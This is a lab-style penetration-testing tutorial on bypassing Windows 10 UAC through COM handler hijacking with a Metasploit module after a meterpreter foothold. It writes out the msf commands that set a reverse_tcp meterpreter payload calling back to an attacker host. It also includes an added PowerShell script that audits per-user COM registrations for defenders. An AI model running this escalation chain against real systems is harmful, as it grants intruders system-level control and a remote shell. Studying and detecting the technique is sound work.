In this article we are going to bypass User Account Control (UAC) on a targeted system. This is post-exploitation: the attacker must first exploit the target system and then escalate privileges with the UAC Protection Bypass via COM Handler Hijack.
Let's start!!
Attacker: Kali Linux
Target: Windows 10
Firstly, exploit the target to receive a meterpreter session on the victim's system. Once you have meterpreter session 1, type the following commands to check the session's user and privileges.
getuid
getprivs
From the given image you can perceive that the attacker is inside the meterpreter shell of the victim's system but does not have system/admin authority and privileges. Hence we need to bypass the UAC protection of the targeted system.
To perform this attack you need to manually add the bypass_comhijack exploit to the Metasploit framework.
Copy the entire content of "bypass_comhijack" from here and paste it into a text document, then save it as bypass_comhijack.rb in the following path:
/usr/share/metasploit-framework/modules/exploits/windows/local
From the given image you can observe that the bypass_comhijack.rb exploit has been saved. As the attacker already has a meterpreter session, he can now use this exploit to bypass UAC protection.
This module bypasses Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high-integrity processes are loaded, these registry entries are referenced, resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. The registry key modifications are cleaned up after payload invocation.
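A defender-side check for the mechanism described above, added here as an example rather than code from the original post or from the module: it lists per-user COM handlers under HKCU:\Software\Classes\CLSID (assumed to be the standard per-user registration location, which COM consults before the HKLM counterpart) whose InprocServer32 DLL either shadows a machine-wide CLSID or lives outside the Windows directory.

```powershell
# Added audit script (not part of the original post or the module).
# Assumption: per-user COM classes live under HKCU:\Software\Classes\CLSID and
# take precedence over HKLM:\Software\Classes\CLSID when a class is resolved.
# A per-user InprocServer32 that shadows a machine-wide CLSID, or points at a
# DLL outside the Windows directory, is worth a closer look.

$userClsidRoot    = 'HKCU:\Software\Classes\CLSID'
$machineClsidRoot = 'HKLM:\Software\Classes\CLSID'
$systemRoot       = [Environment]::GetFolderPath('Windows')

function Get-SuspiciousUserComHandlers {
    if (-not (Test-Path $userClsidRoot)) { return @() }

    Get-ChildItem -Path $userClsidRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid  = $_.PSChildName
        $inproc = Join-Path $userClsidRoot "$clsid\InprocServer32"
        if (-not (Test-Path $inproc)) { return }   # no in-process server, skip

        # The (default) value of InprocServer32 is the DLL that COM will load.
        $dll = (Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($dll)) { return }
        $expanded = [Environment]::ExpandEnvironmentVariables($dll)

        # Does a machine-wide registration exist for the same CLSID? If so, the
        # per-user entry overrides it for this account only.
        $shadowsMachine = Test-Path (Join-Path $machineClsidRoot $clsid)
        $outsideWindows = -not $expanded.StartsWith($systemRoot, [StringComparison]::OrdinalIgnoreCase)

        if ($shadowsMachine -or $outsideWindows) {
            [pscustomobject]@{
                CLSID          = $clsid
                Dll            = $expanded
                DllExists      = Test-Path -LiteralPath $expanded
                ShadowsHKLM    = $shadowsMachine
                OutsideWindows = $outsideWindows
            }
        }
    }
}

Get-SuspiciousUserComHandlers | Format-Table -AutoSize
```

Legitimate per-user application installs also register handlers outside the Windows directory, so treat the output as a triage list rather than a verdict. Because the module removes its keys after the payload runs, a point-in-time scan only catches an in-progress or failed run; pair it with registry auditing or Sysmon registry events (IDs 12 and 13) on that key path.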
use exploit/windows/local/bypassuac_comhijack
msf exploit(bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(bypassuac_comhijack) > set session 2
msf exploit(bypassuac_comhijack) > set lhost 192.168.0.20
msf exploit(bypassuac_comhijack) > exploit
From the given image you can observe that meterpreter session 3 opened. Now type the following commands to determine the session's authority and privileges.
getsystem
getprivs
Wonderful!! The attacker got system/admin authority and privileges.